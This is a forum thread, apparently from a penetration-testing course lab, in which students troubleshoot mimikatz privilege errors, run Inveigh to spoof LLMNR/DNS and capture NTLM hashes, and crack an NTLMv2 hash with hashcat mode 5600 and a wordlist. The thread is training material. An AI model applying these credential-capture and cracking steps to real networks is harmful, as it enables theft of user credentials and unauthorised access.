Hi, on MS01 machine, I added ilfserveradm to local administrators group, but I am unable to get “privilege::debug” “OK” with mimikatz.
This is the error I get:
mimikatz # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM
mimikatz # privilege::debug
ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061
mimikatz #
Any suggestion? Thankyou!
Did you solve it? I am stuck at the same place.
worked for me neither, but
try using netcat with the bat.file
it will work 
If anyone else has same issue, you need to logout then back in.
I am performing all the steps mentioned to add ilfserveradm to administrators group but it is not working. Can please someone help?
Hey guys i got the admin and everything but i m stuck with the last flag i imported inveigh but when i execute it i keep getting the following error :
PS C:\tmp\Inveigh> Import-Module .\Inveigh.ps1
Import-Module .\Inveigh.ps1
PS C:\tmp\Inveigh> Invoke-Inveigh -ConsoleOutput Y -FileOutput Y
Invoke-Inveigh -ConsoleOutput Y -FileOutput Y
[*] Inveigh 1.506 started at 2023-06-08T03:45:44
[+] Elevated Privilege Mode = Enabled
[+] Primary IP Address = 172.16.8.50
[+] Spoofer IP Address = 172.16.8.50
[+] ADIDNS Spoofer = Disabled
[+] DNS Spoofer = Enabled
[+] DNS TTL = 30 Seconds
[+] LLMNR Spoofer = Enabled
[+] LLMNR TTL = 30 Seconds
[+] mDNS Spoofer = Disabled
[+] NBNS Spoofer = Disabled
[+] SMB Capture = Enabled
[+] HTTP Capture = Enabled
[+] HTTPS Capture = Disabled
[+] HTTP/HTTPS Authentication = NTLM
[+] WPAD Authentication = NTLM
[+] WPAD NTLM Authentication Ignore List = Firefox
[+] WPAD Response = Enabled
[+] Kerberos TGT Capture = Disabled
[+] Machine Account Capture = Disabled
[+] Console Output = Full
[+] File Output = Enabled
[+] Output Directory = C:\tmp\Inveigh
WARNING: [!] Run Stop-Inveigh to stop
[*] Press any key to stop console output
Cannot see if a key has been pressed when either application does not have a console or when console input has been
redirected from a file. Try Console.In.Peek.
At C:\tmp\Inveigh\Inveigh.ps1:6365 char:20
+ if([Console]::KeyAvailable)
+ ~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : OperationStopped: (:) [], InvalidOperationException
+ FullyQualifiedErrorId : System.InvalidOperationException
I looked for what causes the issue but i can’t find anything helpful
The changes have to be applied to the system, maybe try a commands like “gpupdate” 
Could anyone please provide a hint on cracking the ntlmv2 hash (last question)? I am stuck an clearly missing something obvious
Sure so copy over inveigh using: copy \TSCLIENT\home\Inveigh.ps1
Next import the module: Import-Module Inveigh.ps1
Run Inveigh with: Invoke-Inveigh -ConsoleOutput Y -FileOutput Y
Wait until a hash pops up.
You can copy the hash
You can run the following to find the right hashmode: hashcat grep | NTLM
You should use 5600 so your command can basically bethe following:
hashcat -m 5600 “past hash here” /usr/share/wordlists/rockyou.txt
You’ll get the password
Hashcat constantly says “Exhausted”, do I have the wrong hash?
Nevermind, I in fact really had the wrong hash 
All good I’ve done that countless times haha
Can’t seem to do the privilege escalation, tried with adding the user to the administrators group and with nc.exe, if anyone can help would appriciate a dm!
Solved
hi i can’t connect to backupadm
If anyone has trouble with this in future, start a cmd prompt as admin… then when you come to put in the username do .\ilfserveradm → this uses local authentication as we’re local admin. Don’t wan tto authenticate against the domain
great advice the .\ before the username will make it sign in with the local admin account instead of the domain one.
Also, make sure you run mimikatz from an elevated cmd line. that stumped me for a while too.
how did you get it to work im stuck please help someone
For anyone with the problem of mimikatz, when we get admin privileges we need to log out and reconnect to the rdp, then we can use powershell as admin without a password.
Hallo, I’m trying to go through the module, but realized that crackmapexec is not present on pwnbox. I tried several ways to install it, but failed. Can anybody hint how to solve this?